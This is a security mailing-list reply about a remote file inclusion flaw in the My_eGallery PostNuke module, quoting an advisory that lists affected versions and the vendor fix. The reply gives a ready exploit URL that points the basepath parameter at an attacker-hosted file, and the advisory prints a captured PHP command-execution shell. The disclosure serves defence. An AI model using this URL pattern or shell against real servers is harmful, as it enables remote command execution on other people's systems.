Re: Remote execution in My_eGallery
Hi,
There is some php scrits which are vulnerables.
One of these is displayCategory.php .
So you just have to go to:
http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.php?basepath=http://[youwebsite].com
And create a directory "public" in the root of your website and put a
file named imageFunctions.php with the code you want to inject.
--
/*-------------------
Best regards,
[::eTiX::]
(Fauvet Ludovic)
-------------------*/
Bojan Zdrnja wrote:
Product: My_eGallery
Versions affected: all <3.1.1.g
Website: http://lottasophie.sourceforge.net/index.php
1. Introduction
---------------
My_eGallery is a very nice PostNuke module, which allows users to create and
manipulate their own galleries on the web, plus offers various additional
features.
For more information and a demonstration you can go to the Website above.
2. Exploit
----------
Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
vulnerability.
Certain php files have some parameters which are used in include functions
not filtered.
An intruder can craft PHP code on their Web site and supply parameter to
My_eGallery so it actually includes malicious PHP code.
The following code was captured as being used in the wild (edited
intentionally):
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).
3. Solution
-----------
Vendor was contacted and promptly replied. Fix is available at the vendor's
site:
http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil
e=index&req=viewdownload&cid=5
As this was seen being exploited in the wild, users are urged to upgrade to
the latest version as soon as possible.
Regards,
Bojan Zdrnja
CISSP
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1
mQGiBD744NQRBACSpcLYHKjo3PCDHVuJZFkzNkK9gzjCNXQnzIwpPwEI5xJd5VuX
g3+gNw0VfYx/qtIXhKW0lGAulEearMpc3SzxTB7vbz8DNU/xquxJPl4yovroJVQz
fE+r9O836yF2SvD8SgiCZfT1uBDNhU2C7z72epc5jsSYDqBMyjm/DS8t7wCg3zgF
NbwEYkx65RNBw4wpGV+o42kD/itttOB/P0Qy8/TLo8RL591PjovuCXsuy11ojS3W
Prewtx9hLO1lheqtrM+xh1fZ9P2c99KBbqVYAHLYjG/rIJGGap9TvisXYnZw2xYg
XQUpv1IB3TyUjKykTwD1L9lTl40Gy32NQLVmf4QEowXJxANVQcybe6GjoMifoY4U
bYZgA/45OW7lL6ufLVREo3WMWIxCqwPDWmyTvAk4vPKexhcSvTgBrjaUFKn8Jk0A
W0IyEM9JjTckgGVOoP5tubhEk2xVzc7dZ0D9oJvmHj92dp0Sbb+HG1uD4v2VmWWM
OoZTDvbk52LJHqfTlXZpalbmFBPg63KzIANgADdicrxxRTLE9LQtRmF1dmV0IEx1
ZG92aWMgKFs6OmVUaVg6Ol0pIDxldGl4QHJ1bmJveC5jb20+iFkEExECABkFAj74
4NQECwcDAgMVAgMDFgIBAh4BAheAAAoJEM+k/AIs6moUaN4AoKrMa/7z7ioFoMM+
ZCN7XGF5pZgpAJ9P0s2pjF2yajoQhT+PPf1WkKmY07kBzQQ++ODZEAcAvAG8v2P8
rWZAs3nFpCJxxYLyEd/HzanEhZ0o2uOQbwrQO3lfJRKwvjhkiZ4Th3bEILEShvhe
gVR4Q2KhSD/c7NUmADI945OMCwWajgPF+/voYKuChLt0gFiOYiT5aK9ElhU9BjTe
guAyMvAsxxski8ntJn+FX7KTjmwqfyRdJtvvxPh5bqqctJqkgVEeGfBPAL0aCjBh
ucZB2j8Ecadzy9SNIvYrF7S1QpBFk7+8dIz15gqd00YPJa5eoUzI/AO1FIKigZdt
mg60PLMNvU5q+TmKFhibE8ZjGOjzErlRM+8AAwUHAKuTuFGLzggST4hvDnI88yLY
q4GUvH+DlAtmhhElOz9HBgNl1sppLqzqnHhcMAaiHKYBU/OV4tNI+FlhfbV8ZQEx
EWKTtxO0sLX3zXWxghkmfxglZggejb8R5pwvP0EzBuKpthAEAHRbWdZxkrqUDw8q
IuPetoeHOCeFMYLeneZZPnPfGALSxfg3ivQMf5tn3LAvP+80dOOVdB0k5GWdWv/4
yBj+mUnhdLuRbtL2mate/jPLB8JGhklk4nntXkf9DvUUhqEYrEx1o1jYyRYFUkVy
bMiS0y3S26O/pgDz88GRiEYEGBECAAYFAj744NkACgkQz6T8AizqahQYXACgjPiE
/GBKDhTcWf1F1A+4aVIazksAoKTa1m181gR8wHDa84VbRQ5aCShe
=Sid/
-----END PGP PUBLIC KEY BLOCK-----